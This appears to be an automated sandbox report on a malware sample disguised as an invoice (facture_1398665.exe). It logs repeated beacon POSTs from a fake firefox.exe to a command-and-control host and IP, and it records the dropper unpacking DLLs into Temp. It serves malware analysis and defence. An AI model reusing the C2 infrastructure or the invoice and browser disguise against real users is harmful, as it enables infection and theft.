2018-05-07 12:51:25 UTC  520  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:25 UTC  520  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:25 UTC  520  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:38 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:25 UTC  520  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 5, Source: 192.168.1.81:49169, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:20 UTC  507  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:20 UTC  507  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:20 UTC  507  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:50:33 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:20 UTC  507  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 50, Source: 192.168.1.81:49215, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:26 UTC  520  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:26 UTC  520  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:27 UTC  520  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:39 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:27 UTC  520  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0


Session ID: 51, Source: 192.168.1.81:49216, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:27 UTC  520  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:27 UTC  520  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:28 UTC  520  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:40 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:28 UTC  521  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 52, Source: 192.168.1.81:49217, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:28 UTC  521  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:28 UTC  521  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:29 UTC  521  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:41 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:29 UTC  521  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 53, Source: 192.168.1.81:49218, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:30 UTC  521  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:30 UTC  521  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:30 UTC  521  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:42 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:30 UTC  521  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 54, Source: 192.168.1.81:49219, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:31 UTC  521  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:31 UTC  521  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:32 UTC  521  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:44 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close


2018-05-07 12:51:32 UTC  521  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0


Session ID: 55, Source: 192.168.1.81:49220, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:32 UTC  521  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:32 UTC  522  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:33 UTC  522  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:45 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:33 UTC  522  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 56, Source: 192.168.1.81:49221, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:51:34 UTC  522  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:51:34 UTC  522  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:51:34 UTC  522  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:51:46 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:51:34 UTC  522  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 6, Source: 192.168.1.81:49170, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:22 UTC  507  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:22 UTC  507  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:22 UTC  507  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:50:34 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:22 UTC  507  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 7, Source: 192.168.1.81:49172, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:24 UTC  507  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache


2018-05-07 12:50:24 UTC  507  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:25 UTC  507  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:50:37 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:25 UTC  508  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 8, Source: 192.168.1.81:49173, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:25 UTC  508  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:25 UTC  508  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:26 UTC  508  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:50:38 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:26 UTC  508  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Session ID: 9, Source: 192.168.1.81:49174, Destination: 91.92.137.74:443, Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

Timestamp  kBytes transferred  Direction  Data
2018-05-07 12:50:26 UTC  508  OUT  POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache
2018-05-07 12:50:26 UTC  508  OUT  Data Raw: 49 0c 0d 5e 1e 50 03  Data Ascii: I P
2018-05-07 12:50:27 UTC  508  IN   HTTP/1.1 200 OK | Server: nginx/1.6.2 | Date: Mon, 07 May 2018 12:50:39 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close
2018-05-07 12:50:27 UTC  508  IN   Data Raw: 30 0d 0a 0d 0a  Data Ascii: 0

Code Manipulations

Statistics

Behavior

• facture_1398665.exe
• facture_1398665.tmp
• firefox.exe
• firefox.exe
• firefox.exe
• dllhost.exe
• cmd.exe
• msiexec.exe
• msiexec.exe
• explorer.exe

System Behavior

Analysis Process: facture_1398665.exe PID: 3792 Parent PID: 3020

General

Start time: 14:49:19
Start date: 07/05/2018
Path: C:\Users\user\Desktop\facture_1398665.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\Desktop\facture_1398665.exe'
Imagebase: 0x400000
File size: 2153784 bytes
MD5 hash: FE1214A06FFC40B1EBB524F185894487
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

File Activities

File Created

File Path | Access | Attributes | Options | Completion | Count | Source Address | Symbol
C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp | read data or list directory and synchronize | normal | directory file and synchronous io non alert and open for backup ident and open reparse point | success or wait | 1 | 40E461 | CreateDirectoryW
C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | read attributes and synchronize and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 40C322 | CreateFileW

File Deleted

File Path | Completion | Count | Source Address | Symbol
C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | success or wait | 1 | 40E1A4 | DeleteFileW

File Written

File Path | Offset | Length | Value | Ascii | Completion | Count | Source Address | Symbol


C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

unknown 1228800 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

success or wait 1 40C448 WriteFile

File Read

File Path | Offset | Length | Completion | Count | Source Address | Symbol

C:\Users\user\Desktop\facture_1398665.exe | unknown | 64 | success or wait | 1 | 40C3AC | ReadFile

C:\Users\user\Desktop\facture_1398665.exe | unknown | 4 | success or wait | 2 | 40C3AC | ReadFile

C:\Users\user\Desktop\facture_1398665.exe | unknown | 4 | success or wait | 4 | 40C3AC | ReadFile

C:\Users\user\Desktop\facture_1398665.exe | unknown | 4 | success or wait | 2 | 40C3AC | ReadFile

Analysis Process: facture_1398665.tmp PID: 3824 Parent PID: 3792

General

Start time: 14:49:20

Start date: 07/05/2018

Path: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

Wow64 process (32bit): false

Commandline: 'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe'

Imagebase: 0x400000

File size: 1228800 bytes

MD5 hash: 9AE8DFC6C5CB2222DBD09F1176058373

Has administrator privileges: true

Programmed in: Borland Delphi

Reputation: low

File Activities

File Created

File Path | Access | Attributes | Options | Completion | Count | Source Address | Symbol

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp | read data or list directory and synchronize | normal | directory file and synchronous io non alert and open for backup ident and open reparse point | success or wait | 1 | 4AE2C1 | CreateDirectoryW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\_isetup | read data or list directory and synchronize | normal | directory file and synchronous io non alert and open for backup ident and open reparse point | success or wait | 1 | 4DE93C | CreateDirectoryW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-E6HJR.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-TLFG5.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-R06PT.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmp | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 4AAB52 | CreateFileW

File Moved

Old File Path | New File Path | Completion | Count | Source Address | Symbol

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-console-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-datetime-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-debug-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-errorhandling-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-file-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-file-l1-2-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-file-l2-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-handle-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-heap-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-interlocked-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-libraryloader-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-localization-l1-2-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-memory-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-namedpipe-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-processenvironment-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-processthreads-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-processthreads-l1-1-1.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-profile-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-rtlsupport-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

